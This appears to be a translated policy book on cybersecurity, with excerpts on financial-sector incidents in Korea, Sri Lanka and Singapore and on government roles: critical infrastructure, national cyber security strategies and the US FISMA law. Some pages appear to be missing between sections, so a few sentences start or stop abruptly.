Although Korea was unable to take part in this global discussion, it answered the questions posed by the World Bank. They noted that although Korea has advanced information networks, the level of security of those networks still has room for improvement. In Korea 65% of stock exchange transactions are carried out over the Internet, and about 25 million people use the Internet. Recent incidents such as the damage caused by the Slammer worm in January 2003 had severe effects in Korea and revealed the fragile nature of networks.

Korea presented statistics showing a low level of awareness of system security. According to the Ministry of Information and Communication, only 12.9% of e-commerce companies, 16.7% of educational institutions, and 9.2% of other organizations have a unit for information security. Korea noted that many companies see e-security as a vague cost that is achieved only by allocating sufficient resources and time. For example, only about 12.9% of e-commerce companies and 6.1% of all companies in the country use intrusion detection systems to protect themselves.

Sri Lanka

The Sri Lankan representative stated that threats such as worms and wireless vulnerabilities exist in that country, but that the Sri Lankan authorities have so far received no reports of attacks on banking systems. The country has been using automated teller machines for about 20 years. Although electronic banking in Sri Lanka is in its infancy, it is spreading rapidly. Shares and money can be exchanged over the Internet, but these facilities too are still in the early stages of development. At present the most important security incident in Sri Lanka is the theft of user IDs and passwords. For financial services institutions, the level of risk awareness is a key issue, and risks must also be assessed carefully.

Cybersecurity in Singapore's Financial Sector

Tony Chew [242], director of technology risk supervision at the Monetary Authority of Singapore (MAS) [243], gave a brief overview of the basics of cybersecurity. He began by saying that the responsibility of his department is "to inform institutions, to supervise them, or to be strict with them". Singapore is striving to become an international center for financial services, and for that reason IT security is of particular importance to it.
Singapore's largest banks were attacked by intruders in 2001 and 2002, which shows the country's urgent need for strategies to reduce security risks. In 2001 Singapore's largest bank (UOB) discovered an intruder in its Internet banking system. Although most of the information about this incident remained confidential, it emerged that intruders from Eastern Europe had attacked the banking system. The bank's data were examined, and the banking system for updating customer accounts was tampered with. Not only did it take experts several months to find the root of the problem, but a great deal of effort and expense went into discovering who or what had caused it.

In 2002 there was another attack, on Singapore's second-largest bank (DBS). In this incident the intruders were able to target customers' systems because of network sharing features and poorly configured systems. The intruders planted Trojan horses and keystroke loggers in the accounts of 21 bank customers, which allowed them to obtain personal identification numbers (PINs) and user IDs. The incident caused losses of $62,000 to customer accounts, but it is notable that its negative effect on public opinion was far greater, because the country's newspapers wrote about it for a month. Incidents of this kind can lead to a crisis of public confidence in Internet banking systems.

A fundamental weakness that played a part in all of these incidents was the use of single-factor authentication. Even now, most automated teller machines use very basic authentication methods, and only one or two dreadful incidents could force banks to reconsider this practice. There is also a degree of excessive trust and confidence in SSL technology; yet the security SSL provides is very limited, because it protects information only in transit and not at the source or the destination. Databases and other storage media should always be encrypted so that their security is ensured. Strong cryptography should also be used for PINs; but this alone is not enough, because PINs are short and intruders can easily obtain them.

The Monetary Authority of Singapore drew up "Technology Risk Management Guidelines" for financial services institutions, comprising 26 recommendations on building layered security. The three main categories of these guidelines are:

1. Establishing a sound process for risk management
2. Strengthening availability, security, and recoverability
3. Using strong cryptography to protect data

In addition to drawing up technology policies, the Monetary Authority of Singapore has required banks to carry out penetration testing and an assessment of the operating environment at least once a year. The Authority has a technology risk assessment team and a system for rating banks in Singapore's economic system, based on six criteria set by the Authority. These criteria divide institutions into five categories by level of security, with 1 indicating the most secure and 5 the least secure. Banks are required to achieve at least grade 2 in this assessment, and must also have a rapid recovery and restoration plan for their systems. To create an incentive for banks to improve security and to instill a sense of standardization, the results of this rating are published. Banks are also required to report any security incident.

With the growing use of mobile payment devices, the vulnerabilities of wireless technology must also be taken into account. At present, security practices in Singapore's wireless banking are still under review.

Summary of Questions and Proposals

The closing recommendations and questions covered the key points of this global seminar.

First, information and awareness play a vital role in educating the public about current security needs. Government regulations such as "mandatory suspicious activity reporting" are useful only if they are actually put into effect.

Second, transparency and the publication of incident information are very important for improving the security of future systems. It was noted that media coverage of events can sometimes be harmful, because customers are in any case influenced by the press. Instead, companies should correct the situation quickly. Addressing the problem by drawing up an action plan is a better way of dealing with a security intrusion. The major question that arises here is how much of this information should be published, and when. Guidance on this is given elsewhere in this book.

Third, most participating countries stressed the need for cross-sectoral cooperation. One area in which cooperation would be fruitful is certification programs. Here organizations should work with the software community to identify the security needs of each sector. EBG, a communication and information network, and InfraGard, a public-private network belonging to the FBI, are two examples of such bodies. InfraGard covers all critical infrastructures and has about 10,000 members. The aim of this organization is to build trust and encourage information sharing among its members. It can be taken as an example of how to build relationships in the field of IT security.

Fourth, to create a form of commitment to e-security, roles and responsibilities must be defined; drawing up a standard of care and of fiduciary duty for organizations in the electronic economy is therefore a very important issue. The topics under this heading are deposits and transactions, public trust, and confidence in financial services systems.

Finally, outsourcing was one of the participants' major concerns. One example of the problems in this area occurred in 2001, when a web hosting company in the United States was penetrated and the security of more than 300 banks was compromised as a result. Further details on outsourcing can be found elsewhere in this book and in the other sources mentioned in the appendices.

In conclusion, we note that for legislators and supervisors, re-evaluating the regulatory umbrella (especially with regard to money transfers by third parties, such as web hosting companies) is vital.
IT Security and Government Policies

Chapter 1. Introduction
Chapter 2. Protecting Government Systems
Chapter 3. The Role of Law and Government Policy with Respect to the Private Sector
Chapter 4. Government Cybersecurity Policies
Chapter One

Introduction

As in other areas that affect the Internet, government policy plays an important role in IT security. Nevertheless, care is needed here: a general policy framework can strengthen security, but the problems caused by poor government regulation outweigh the benefits of such regulation. Technology is changing rapidly, and new cyber threats [1] spread so quickly that government regulations can easily become obstacles to rapid, innovative responses. The best approach is therefore to find a balance between regulatory and non-regulatory measures. To achieve such a balance, policymakers must pay attention to certain inherent and unique characteristics of the Internet. Compared with earlier information and communication technologies, cyberspace [2] is a decentralized space. Part of the power of the Internet comes from the fact that it has no gatekeepers, and most of its functionality lies at the edges of the network rather than at its center. Government cybersecurity policies must take these characteristics of the Internet into account. This chapter sets out a series of steps that governments can use, independently of technical decisions, to improve the security of their computers. [3]

Although this varies from country to country, in many countries some or all components of the communication networks, and many of the important and sensitive infrastructures that depend on computer systems (banking, transportation, energy, manufacturing, and so on), are owned and operated by the private sector. [4] Most of the responsibility for ensuring the security of these systems therefore rests with the private sector. Even so, the existence and proper functioning of such systems is essential to national welfare, and they are typically used in situations where there is greater demand for them, so government pays close attention to them. Governments usually have their own computer systems, including computers used for national security, emergency services, health, and other essential functions, and these often depend on private communication networks. Overall, many of the computer systems of private companies and government organizations depend on the same software and hardware, designed and built by private companies, so security in these systems is a matter of considerable concern.

For all these reasons, responsibility for the security of these systems is shared between government and the private sector. As a first priority, government is responsible for "putting its own house in order"; that is, it must apply sound security practices to improve the safety of its own systems. It is also recognized worldwide that government should use the power of civil and criminal law to punish and deter attacks on private-sector systems, as it does for government systems. Beyond that, many governments have concluded that they must take on additional responsibilities to improve computer security practices in the private sector. The aim is for government to adopt policies under which laws and technology programs do not stifle initiative and innovation, but instead maximize the benefits of government involvement in these matters. In a climate of cooperation, a balance is found as follows:

• market pressure that encourages private companies to secure their computer systems in order to earn greater profit;

1 Cyber Threats
2 Cyberspace
3 For more information, see the following sites:
http://www.abanet.org/abapubs/books/cybercrime
http://www.isn.ethz.ch/crn
4 In some countries privatization is entirely new, which means that users, legislators, and policymakers, while grappling with the full range of traditional problems associated with privatization, have only recently begun to wrestle with the problem of security as well.
• government research and awareness raising;
• computer crime laws that protect the computers of government and private networks;
• concepts from traditional law that have been carried over into the computer environment; and
• laws, regulations, and government policies focused specifically on improving computer security.

The concept of "computer security policy" can be seen as part of a broader subject called "the role of law in building trust online". Creating a trustworthy environment in cyberspace requires adapting laws and government policies from other fields to the domain of cybersecurity. These fields include consumer protection [5], privacy of data and communications [6], intellectual property rights [7], and the e-commerce framework [8]. In the offline world, the law provides protections for commercial transactions and for consumers. Most of these laws can also be applied in cyberspace, but countries seeking to expand information and communication technology (ICT) should examine whether there are gaps in their laws that prevent the trust needed to improve the security of cyberspace from developing. Indeed, countries interested in expanding e-commerce may find that their laws on financial services, cyber property, and consumer protection do not provide the trust or support needed even for offline transactions. Reform of cyber law may be carried out as part of reforms to more general laws. This book focuses on those laws and policies that refer directly to attacks on computer systems (some of which are mentioned in Part Three and in the appendices) and leaves questions about the wider framework of information and communication technology and e-commerce to other sources. [9]

In addition to an introductory discussion of developing countries, this part describes in detail programs and policies that are in line with the laws of many developed countries and multinational organizations. The points raised have been updated with reasonable care. However, the focus on the resources and models of developed countries and international centers should not discourage other countries from carrying out further studies of their own. It is very important that all countries develop, make progress, and choose a suitable framework for their own e-security [10]. The available financial and human resources differ, and developing countries will have to approach this subject at a basic level; but the principles set out here apply worldwide. It should always be remembered that cyberspace and cybersecurity are not confined by national borders.

The Concept of Critical Infrastructures

In a number of countries, the government's response to computer security problems has gone under the name of critical infrastructures [11]. A critical infrastructure is a network of physical assets and systems that play a major part in a country's economy or welfare. For example, the financial services network is a critical infrastructure that includes all private banks, the central bank, commodity exchanges, cheque clearing organizations, and other institutions involved in financial and credit services. In almost every country in the world these operations are carried out using computers. The transportation network is another critical infrastructure, made up of roads, bridges, canals, railway lines, and airports. The transportation infrastructure is largely physical and mechanical; but the proper operation of traffic lights, the opening and closing of bridges, the running of trains, and air traffic control all depend on the proper functioning of computers.

There is no fixed definition of the critical infrastructure sectors, and the list of critical infrastructures used by policymakers varies from one country to another and from

5 Consumer Protection
6 Data & Communications Privacy
7 Intellectual Property Rights
8 E-Commerce Framework
9 Early global Internet policymaking includes a section on the full range of security issues that affect ICT development.
10 E-Security
11 Critical Infrastructures
one time to another. The United States government's cybersecurity strategy, published in February 2003, identifies 13 critical infrastructure sectors: 1) agriculture, 2) food, 3) water, 4) public health, 5) emergency services, 6) government, 7) defense industry, 8) information and telecommunications, 9) energy, 10) transportation, 11) banking and finance, 12) chemicals and hazardous materials, and 13) postal and shipping services. [12] By comparison, Canada's critical infrastructure protection strategy names only six sectors: 1) communications, 2) government, 3) energy and utilities, 4) services (which in Canada include financial services, food distribution, and health), 5) security, and 6) transportation. [13] How a country defines its critical infrastructures is less important than understanding the concept of critical infrastructure. [14]

The concept of critical infrastructure is important for many reasons. First, it helps to make clear why computer security matters. If policymakers understand that when computers fail, money in banks cannot be paid out, trains cannot leave the station, and even drinking water will not be pumped, they will be better able to grasp the consequences of security problems. Second, infrastructure sectors are important because they help to define the responsibilities of communities, and they bring into being communities with shared interests that need to cooperate with one another to improve security. For example, people in the electricity industry and government advisers can work together to play a positive role in removing vulnerabilities in the power system. Computer security measures, including the identification of best practices [15] and the sharing of information about vulnerabilities, can to some extent be applied within existing institutions and industry sectors. In the private sector these institutions include trade associations, standards bodies, and other bodies that oversee various industries. In the public sector, most countries carry out cybersecurity policy through ministries and regulatory agencies (such as those that have traditionally regulated banking, telecommunications, and the energy sector).

There are currently a number of large, pioneering entities that cooperate in this area on a larger scale. For example, in May 2003 the G8 group set out 11 principles to be taken into account in developing a risk reduction strategy for critical information infrastructure. [16] These principles are as follows:

1. Countries should have emergency warning networks for cyber threats and incidents.
2. Countries should raise their level of awareness and knowledge in order to help people understand the nature and extent of their critical information infrastructure, and should define people's roles in protecting this information.
3. Countries should study their infrastructures and identify the interdependencies among them, and in this way increase the protection of these infrastructures.
4. Countries should increase partnership between the public and private sectors, and should analyze and share their important infrastructure information so that they can prevent damage as far as possible and respond to the damage that does occur.
5. Countries should create and maintain dedicated crisis communication networks, and should subject them to

12 The National Strategy to Secure Cyberspace [U.S.]
http://www.whitehouse.gov/pcipb
http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf
13 Office of Critical Infrastructure Protection & Emergency Preparedness [Canada]
http://www.ocipep.gc.ca/home/index_e.asp
14 For details of how various countries have responded to the question of protecting essential infrastructures, see the International Critical Information Infrastructure Protection Handbook. This book was produced at the Center for Security Studies and Conflict Research of the Swiss Federal Institute of Technology:
http://www.isn.ethz.ch/crn
15 Best Practices
16 For more information, see the following site:
http://www.cybersecuritycooperation.org/documents/G8_CIIP_Principles.pdf
evaluation, to ensure that they remain secure and stable in emergency situations and can be used.
6. Countries should ensure that data availability policies [17] also take into account the security of critical information infrastructures.
7. Countries should facilitate the tracing of attacks on critical information infrastructures and, where appropriate, release the information from such tracing to other countries that request it.
8. Countries should carry out training and exercises to increase response capability, should test their plans for contingencies that may arise when an attack occurs, and should encourage everyone else to carry out similar activities.
9. Countries should ensure that they have appropriate laws and acceptable procedures for dealing with security problems, and should coordinate these investigations with other countries as well as possible; an example is the laws adopted in the Council of Europe Convention on Cybercrime [18] in November 2001, which prepared trained personnel to assess and trace attacks carried out on critical information infrastructures.
10. Countries should take part in international cooperation at the appropriate time in order to secure their critical information infrastructures; this includes setting up emergency warning systems, sharing and analyzing information on vulnerabilities and incidents, and cooperating on attacks against such infrastructures, always with regard to local laws.
11. Countries should increase their national and international research and development, and should encourage the use of security technologies in accordance with international standards.

A unique characteristic of computer security is the interconnection among sectors, including similar and identical hardware and software, and their dependence on a shared communication network. Governments must therefore make policy in a way that ensures that information about vulnerabilities and the related solutions is shared with the infrastructure sectors. This can be done by choosing a lead center within government for the central coordination of cybersecurity programs and policies, a subject we will examine later in this part.
an executive agency created by the National Office for the Information Economy and overseen by the Ministry of Communications and Information Technology.[26]
• Italy has set up an interministerial committee for the responsible use of the Internet, managed by the Department of Innovation and Technology in the Prime Minister's office.
• In 2000 the Prime Minister of Japan set up a group in the Cabinet to deal with IT security, so that security measures and policies could be better coordinated among ministers and agencies. The group was made up of experts who were members of the relevant agencies and ministries and of the private sector.[27]

Where the leadership of electronic security is placed within government matters a great deal. For example, deciding when to release information about cyber security vulnerabilities to the public requires the question to be examined from several sides. Placing this responsibility in the Ministry of Defense, which is usually responsible for keeping national security secrets, may disrupt the release of information and mean that too little is published to raise public awareness. Since cooperation between the public and private sectors is an important part of what we believe to be the most effective computer security strategy, it may be better for the leadership of cyber security to sit in an economic agency or a government-affiliated company, under the supervision of the country's highest executive authority.

More important than which agency or agencies should be responsible for computer security, however, is that some form of "national leadership" be created, so that there is assurance that computer security will receive enough attention from the different parts of government. When we think about bringing computer security into existing ministries, important organizational questions arise that need proper answers. If the only authority of the agency directing cyber security is to exhort people and to publish information for the public, its practical authority over the security of other ministries will be limited. Methods are therefore needed that allow cyber security leaders to establish security in the existing systems of agencies and ministries. One way of obliging ministries to comply with computer security standards is for a responsible official in the government's central security office to be able to reject the purchase orders of government agencies that have not followed security standards.

The United States has adopted this approach to some extent and has given the President's Office of Management and Budget the right to approve or reject capital spending on computer systems, on various grounds including security. Another measure could be to require ministries and government agencies to carry out an annual cyber security audit and to report its results to the cyber security office. Whatever structure is chosen, its senior manager should be appointed by the office of the president or prime minister so that all departments and agencies take it seriously.

Another organizational challenge for government is human resources. Governments have difficulty recruiting and retaining specialist computer security personnel. One solution could be to offer scholarships for computer security studies, under which recipients commit themselves to serve the government for a set number of years. A short-term solution could be a two-stage program run with the private sector, in which cyber security specialists work for the government while all or part of their salary is paid by their private sector employer. The human resources problem in cyber security, in developed and developing countries alike, may confront government with another fundamental difficulty, because government cannot pay specialists in this field substantial wages compared with the private sector.

26 Under Australian law, executive agencies are non-penal bodies and, when the agency's work spans the whole of government and the agency is somewhat independent of the government structure, they must be established by the highest local government authority. The head of an executive agency is appointed by a minister (here the Minister for Communications and Information Technology) and answers only to that minister.
27 For more information see the following site:
http://www.kantei.go.jp/foreign/it/security/2000/0519taisei.html
Developing a National Cyber Security Strategy

The process of developing a national cyber security strategy can be an effective tool for deciding what the financial vulnerabilities of national cyber security are, what the government's responsibilities should be, and which policies and legislative reforms should be pursued. Such strategies can also define the relationship between government and the private sector. Here we concentrate mainly on those elements of national cyber security strategies that deal with supporting government computers. Later in Part Four we discuss the government's role in improving the security of private sector systems. A review of the United States strategy can make the benefits of doing this clear:

"In general, the private sector is prepared to respond to the growing threats in cyberspace. In some specific cases, however, a response by central government is more appropriate and more acceptable. Internally, continuity of this work in government requires assurance of the security of the government's own cyber infrastructure and of the assets needed to support its essential missions and services. Externally, in cases where high transaction costs and legal barriers cause major problems in cooperation; in cases where government operates in the absence of private sector forces; and when analysis of the problems leads to shared critical resources becoming unreleasable, the government's role in cyber security will ensure that the problems are resolved."[28]

To date the United States has had the broadest and most extensive processes for developing national cyber security strategies, and similar material and themes can be seen in the practice of other countries and of international groups. Although the details of these processes and the consequences of laws and organizational structures differ from country to country, the process of developing a cyber security strategy resembles the method many countries have used to develop national information and communications technology strategies.[29] In fact, security is one component of national ICT strategies, and a cyber security strategy can be put in place through legal principles and methods similar to those used in drafting a national ICT development plan. For example, in March 2001 Japan incorporated cyber security into its policy prioritization program, known as e-Japan.[30]

The experience of countries that have developed national cyber security strategies shows that the work has some common elements and components:
1. Assessing national vulnerabilities and publishing public reports that set out the overall picture and raise awareness among policymakers and the public;
2. Establishing a leadership structure in the executive branch of government to oversee the development and implementation of policies;
3. Preparing a detailed national plan in consultation with the private sector;
4. Adapting regulations and guidelines on matters such as sharing of and access to information in order to create accountability.

28 The National Strategy to Secure Cyberspace [U.S.]
http://www.whitehouse.gov/pcipb
http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf
29 For more information see footnote 17.
30 http://www.kantei.go.jp/foreign/it/network/priority-all/index.html
31 Australia's National Information Infrastructure: Threats & Vulnerabilities

The first phase is a detailed assessment of vulnerabilities and the raising of awareness. For example, in 1997 Australia published a report entitled Australia's National Information Infrastructure: Threats and Vulnerabilities.[31] This report, prepared by the Defense Signals Directorate, leads the reader to the conclusion that Australian society is vulnerable to the relatively numerous shortcomings of computer networks, and that a formal, defined structure for coordinating and implementing government policies to protect critical infrastructure
does not exist.[32] To study this subject, in 1996 the President of the United States created a body called the President's Critical Infrastructure Protection Board,[33] made up of a number of individual and corporate officials. This body had no rule-making power and no stable, permanent structure; instead it provided a forum for reporting, interviews and research, and published a report that drew the attention of policymakers, legal authorities, the mass media and the public. The body offered further notable recommendations in October 1997 and called for closer cooperation between the private sector and government.

The second phase is the creation of permanent structures in the executive branch for cooperation in developing and implementing policies. In Canada, for example, following publication of the results of an assessment by the internal Critical Infrastructure Protection Task Force,[34] the government established a cooperation center for collecting and protecting information, assessing threats and examining security incidents, and an office for critical infrastructure protection and emergency preparedness to provide leadership at the national level.[35]

In the United States, Clinton and Bush took several practical steps by establishing policy-making bodies in the executive branch. The plans called for a national proposal for protecting infrastructure to be prepared.[36] These presidential orders did not authorize government agencies to oversee private sector systems; instead they stressed the need for cooperation and information sharing between government and the private sector. Other leadership structures are discussed in the section "Leadership and Organization".

The third phase is the development of the strategy itself. As noted above, a national cyber security strategy can be a separate document or part of the national ICT strategy. The key point in this process is consultation between government and the private sector. In Japan, which has merged cyber security into its overall ICT strategy, this process was carried out with the cooperation of the "IT Strategy Headquarters" in the Cabinet and the "IT Strategy Council", which was made up of twenty experts and was originally established in order to combine the capabilities of government and the private sector.[37]

32 For more information see the book introduced in footnote 17.
33 President's Critical Infrastructure Protection Board
34 Critical Infrastructure Protection Task Force
35 Office of Critical Infrastructure Protection & Emergency Preparedness [Canada]
http://www.ocipep.gc.ca/critical/nciap/disc_e.asp
36 On this matter Clinton issued "Presidential Decision Directives" (PDD):
63: Critical Infrastructure Protection, May 22, 1998,
http://www.fas.org/irp/offdocs/pdd-63.htm
62: Protection Against Unconventional Threats to the Homeland & Americans Overseas, May 22, 1998,
http://www.fas.org/irp/offdocs/pdd-62.htm
After September 11, 2001, Bush also signed two executive orders under which operations were relocated and new entities were created in the executive branch to protect critical infrastructure:
E.O. 13228, Establishing the Office of Homeland Security & the Homeland Security Council, October 8, 2001,
http://fas.org/irp/offdocs/eo/eo-13228.htm
E.O. 13231, Critical Infrastructure Protection in the Information Age, October 16, 2001,
http://ciao.gov/News/EOonCriticalInfrastructureProtection101601.html
37 e-Japan Security Policy Program, March 29, 2001,
http://www.kantei.go.jp/foreign/it/network/priority-all/index.html
38 The latest version is:
The National Strategy to Secure Cyberspace:
http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf.
This strategy was prepared with the help of the following document:
The National Strategy for Physical Protection of Critical Infrastructures & Key Assets:
http://www.dhs.gov/interweb/assetlibrary/Physical-Strategy.pdf.
Both of these documents describe components of the national security strategy and were published by the White House in July 2002.

The United States cyber security strategy is a separate document, and its preparation was the product of a long process of public consultation managed by the staff of the National Security Council. The first draft of the strategy documents was published in 2000, the revised version in the fall of 2002, and the final version in February 2003.[38] At every one of these stages the United States plans were revised on the basis of detailed consultation within government and between government and the private sector. Ten public meetings were also held in major cities around the world to gather the resources
used in preparing these strategies. At these meetings social and civic groups, business partners and companies consulted with one another. Another cyber security strategy worth mentioning is Australia's.[39]

There has also been activity at the regional level to develop such strategies. The European Union has published its cyber security strategy not in a single document but over several years, in a series of documents relating to proposals of the European Commission.[40] The Asia-Pacific Economic Cooperation (APEC)[41] has adopted a regional cyber security strategy that was drafted by the Telecommunications and Information Working Group (TEL)[42] with the active participation of the private sector.[43] The Organization of American States (OAS)[44] has also taken responsibility for regional activities.[45] In June 2003 the General Assembly of the Organization of American States adopted a resolution on developing an inter-American strategy against threats to computer information and networks.[46] The Organisation for Economic Co-operation and Development (OECD)[47] has likewise published guidelines for governments and private companies on developing a cyber security strategy.[48]

Out of all these efforts, a consistent and coherent set of themes has emerged from cyber security strategies at the national, regional and international levels:

• Public-private partnership: Cyber security requires cooperation between the public and private sectors.[49] The private sector has primary responsibility for ensuring the security of its own systems and networks.
• Public awareness: "Users of the network, including producers, administrators, operators and individual users, must be aware of the threats to the network and of its vulnerabilities, and must take responsibility for protecting the network according to their position and role."[50]
• International practices, guidelines and standards: Cyber security should be developed on the basis of the growing number of standards and best practices, voluntarily and by consensus, and practices should be developed through advisory institutions and international standards organizations. These standards are an important guide for the government's internal policies. Government has no need to set technical standards for the private sector, and should not do so.[51]
• Information sharing: It has become quite clear that the effort to achieve cyber security has run up against users' inattention to vulnerabilities and attacks. Private sector organizations should be encouraged to share information about security incidents with other organizations in the sector, with government, and with other countries.
• Education and training: The APEC strategy says: "Developing human resources is essential if efforts to raise the level of security are to succeed. To secure cyberspace, governments and the companies that work with them must train their staff in the complex technical and legal issues involved in protecting critical infrastructure and dealing with cybercrime."
• Respect for privacy:[52] ICT networks carry and store highly sensitive personal data. Privacy is an essential component of trust in cyberspace, and cyberspace security strategies must be implemented in ways that are consistent with the important values of society.[53]
• Vulnerability assessment, warning and response: As the APEC strategy puts it: "Effectively combating cyberspace offences and protecting infrastructure information depends on economies having systems for assessing threats and vulnerabilities and issuing the necessary warnings. By identifying and sharing information about a threat before it causes widespread damage, networks are better protected."[54] The United States strategy asked all stakeholders to take part in creating a national-level cyber security response system so that attacks on computer networks are identified quickly.
• International cooperation: To make consultation and cooperation on spreading a "culture of security" between government and the private sector easier at the international level, governments must work with one another to adopt compatible laws on cybercrime, and the law enforcement forces of different countries must help one another through international organizations.[55]

The process of developing and implementing cyber security strategies for government has elements in common with developing and implementing a cyber security program in other organizations and legal entities:
• assessing vulnerabilities;
• raising awareness;
• appointing one person as leader to coordinate policies;
• developing a risk management[56] program;
• adopting appropriate security guidelines;
• organizational orientation; and
• periodic reassessment and continuous improvement.

The fourth phase (with its focus on government security systems) is the announcement of guidelines and the enactment of the laws that cyber security requires. Some countries, such as Japan and Italy, have addressed the subject through guidelines of this kind. In July 2000 Japan's cabinet-level IT Security Promotion Committee adopted guidelines on IT security policy which asked all departments and ministries to carry out an assessment of their IT security policies by February 2003 and to take further steps to raise their level of security. In March 2001 the Ministerial Council for Promoting the Digitization of Public Administration[57] published security guidelines for all those involved in government information technology.[58] In 2002, when the United States Congress concluded that the executive branch had not raised the security of government computer systems far enough, it enacted the Federal Information Security Management Act (FISMA)[59] to clarify the requirements and working methods within government.[60] Something similar happened in Tunisia, where in 2002 the government passed and promulgated security laws under which government agencies were required to undergo an annual security audit.[61]

39 E-Security National Agenda [Australia], September 2001,
http://www.noie.gov.au/projects/confidence/Protecting/nat_agenda.htm
40 European Commission, Proposal for a Regulation of the European Parliament & of
46 Development of an Inter-American Strategy to
50 APEC Cybersecurity Strategy,
http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html
Council of European Union, Council Resolution of 28 January 2002 on a common approach & specific actions in the area of network & information security, (2002/C 43/02),
http://www.europa.eu.int/information_society/eeurope/action_plan/safe/netsecres_en.pdf
51 For example, the United States strategy covers both government systems and private sector infrastructure, but it states that government should not impose its security standards on the private sector. For more information see the following source:
The National Strategy to Secure Cyberspace [U.S.], February 2003, pp. 11, 15
http://www.whitehouse.gov/pcipb
http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf
52 Respect for Privacy
53 OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002,
http://www.oecd.org/pdf/M00034000/M00034000.pdf
For more information see the Internet addresses in footnote 48.
54 APEC Cybersecurity Strategy,
http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html
55 Meeting of G8 Ministers of Justice & Home Affairs, Paris, May 5, 2003,
http://www.g8.utoronto.ca/justice/justice030505.htm
56 Risk Management
57 Ministerial Council for Promoting the Digitization of Public Administration
58 http://www.kantei.go.jp/foreign/it/network/priority-all/7.html
59 Federal Information Security Management Act
60 Federal Information Security Management Act, Title III of E-Government Act of 2002, Pub. Law 107-347,
http://csrc.nist.gov/policies/FISMA-final.pdf
61 Auditing
62 See the previous footnote, and also:
http://www.fedcirc.gov/library/legislations/FISMA.html
63 Title 44, United States Code, section 3544
64 Unauthorized Access

Implementing a Cyber Security Strategy in Government Systems: the United States Approach

In the United States the security policy for government information systems has been specified in greater detail and implemented through the Information Security Management Act (enacted in 2002).[62] This law sets out a number of methods for implementing cyber security policy that create "accountability" in the various agencies.

The stated purpose of FISMA is the management of computer security across government. It brings all the efforts made to secure information into line with one another and provides a mechanism for developing and maintaining the minimum controls needed to protect government information systems. The law recognizes that commercial products offer government effective and dynamic solutions, and it leaves the choice of specific hardware and software security solutions to the specialized agencies.

FISMA states that the head of each agency must develop, document and implement an agency-wide information security program that covers the agency's operations, including those managed by contractors.[63] The program must include the following:

• periodic assessment of the risks and of the magnitude of the harm that could result from such causes as unauthorized access[64] (use,
disclosure, disruption, modification or deletion) to information;
• developing policies and procedures that:
  o are based on the risk assessment process;
  o lead to a reduction in the costs of security risks;
  o ensure that information security is fully addressed throughout the life cycle of each agency information system; and
  o ensure that the security requirements and standards of the Office of Management and Budget (OMB,[65] part of the Executive Office of the President) are met;
• preparing subordinate plans for providing adequate information security for networks, facilities, and information systems or groups of information systems;
• holding training courses to raise the security awareness of agency staff, contractors and other users of information systems who work in the agency;
• periodic testing and evaluation of the effectiveness of information security policies, procedures and practices, including testing of management, operational and technical controls;
• a process for planning, implementing, evaluating and documenting the remedial action needed to address deficiencies in the agency's information security policies, procedures and practices;
• procedures for detecting, reporting and responding to security incidents; and
• plans and procedures to ensure continuity of operations for the agency's information systems.

Each agency must submit an annual report to the representative of the Office of Management and Budget and to congressional committees on the adequacy and effectiveness of its information security policies, procedures and practices and on how far they comply with the required elements of the information security program. In addition, the adequacy and effectiveness of information security policies, procedures and practices must also be addressed in a number of other plans and reports, including those that relate to the agency's annual budget, financial management, internal accounting and administrative controls. If any deficiency is found in the policies, procedures and practices, it must be reported to the Office of Management and Budget and to Congress.

Every year agencies must carry out an independent security evaluation to determine the effectiveness of their information security program and practices. Each evaluation has two parts: the first is an examination of the effectiveness of the information security policies, procedures and practices of a subset of the agency's information systems; the second is an assessment of the related information security policies, procedures, standards and guidelines.[66]

To make sure that all information security policies and best practices are implemented, FISMA requires the representative of the Office of Management and Budget to oversee the development and implementation of all information security policies and practices. FISMA also gives the National Institute of Science and Technology the authority it needs to develop information security standards, guidelines and minimum requirements,[67] and requires the representative of the Office of Management and Budget to manage the fulfilment of these requirements and to review and revise agency information security programs at least once a year. The representative of the Office of Management and Budget is responsible for submitting an annual report to Congress on agency performance.[68]

65 Office of Management and Budget
66 Title 44, United States Code, section 3545
67 Title 40, United States Code, section 11331
68 Title 44, United States Code, section 3543
provoked. Congress determined that electronic security is necessary for assessing companies' financial data. Congress also made it mandatory to assess companies with regard to the security of their information systems. In addition, under general corporate law, publicly traded businesses must undergo a financial audit by independent auditors. If the auditors find that electronic vulnerabilities threaten the company's financial records, they add electronic security measures to the scope of their audit. A number of relevant organizations have produced standards and guidelines for auditors to use.

Contract Law

Under contract law, organizations must accept responsibility for unlawful access to customers' data, or damage to it, that results from failures of electronic security. Under this law, a company that states in its electronic materials that it "has a secure system" is presumed to have entered into a bilateral agreement with its customer under which it is obliged to deal with customers in a secure environment. In that situation, if the security of the customer's information is put at risk by electronic attacks, the customer can claim breach of obligations. Likewise, companies that provide web-based services may accept contractual responsibility for the availability of their services. In that case too, if the website stops operating and providing service as a result of denial-of-service attacks,[69] the company will be exposed to claims of breach of obligations from its customers.

be faced with a breach of obligations. When a company's computers are used to carry out electronic attacks on a third-party target, the intermediary company may be held liable if effective measures to prevent computer theft had not been taken. When an attack is carried out by one of the company's employees, the victims may, by proving this, accuse the company of disregarding the necessary hiring or supervision rules and standards.

At present, even in the United States, where tort law exists in many cases, laws of this kind have not been developed to any great extent, and so far the courts have not declared attention to network security to be a legal duty. Perhaps only the passage of time can make the old theories of liability applicable to computer security. When that happens, the courts can take computer security standards from the best practices of regulators and the business community, and the standards can also be revised by self-regulatory organizations.
have clearly defined the banking industry and the health industry. These are described in detail below, but first we turn to some of the important roles of government with respect to the private sector, none of which involves legislation.

Non-legislative Roles of Government

There are various ways of applying government policy to the security of private sector computer systems. These policies are not all legislative; in fact many of them, possibly the ones with the greater effect, can be non-legislative policies.

Research: One of the important roles of government is funding and carrying out research on computer security. The United States National Institute of Standards and Technology (NIST)[71] is a non-regulatory government agency in the United States Department of Commerce. NIST's mission is to develop and promote measurement, standards and technology

In releasing research results to the public, government agencies must in some way overcome their inclination toward secrecy. A good example is the top-secret National Security Agency in the United States, which has placed its security recommendations on its public website for everyone to access.

